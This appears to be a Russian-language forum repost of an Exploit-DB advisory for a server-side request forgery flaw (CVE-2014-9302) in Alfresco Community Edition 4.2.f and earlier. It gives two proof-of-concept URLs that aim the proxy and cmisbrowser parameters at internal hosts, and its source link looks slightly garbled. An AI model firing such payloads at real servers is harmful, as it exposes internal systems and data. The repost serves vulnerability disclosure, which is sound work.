Exploit Alfresco - '/cmisbrowser?url' Server-Side Request Forgery

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39259
Проверка EDB
  1. Пройдено
Автор
V. PAULIKAS
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2014-9302
Дата публикации
2014-07-16
Alfresco - '/cmisbrowser?url' Server-Side Request Forgery
Код:
source: https://www.securityfocus.com/bid/68/info

http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
 
Alfresco Community Edition is prone to multiple security vulnerabilities.
 
An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
 
Alfresco Community Edition 4.2.f and earlier are vulnerable. 

http://www.example.com/alfresco/cmisbrowser?url=http://internal_system:port
 
Источник
www.exploit-db.com

Похожие темы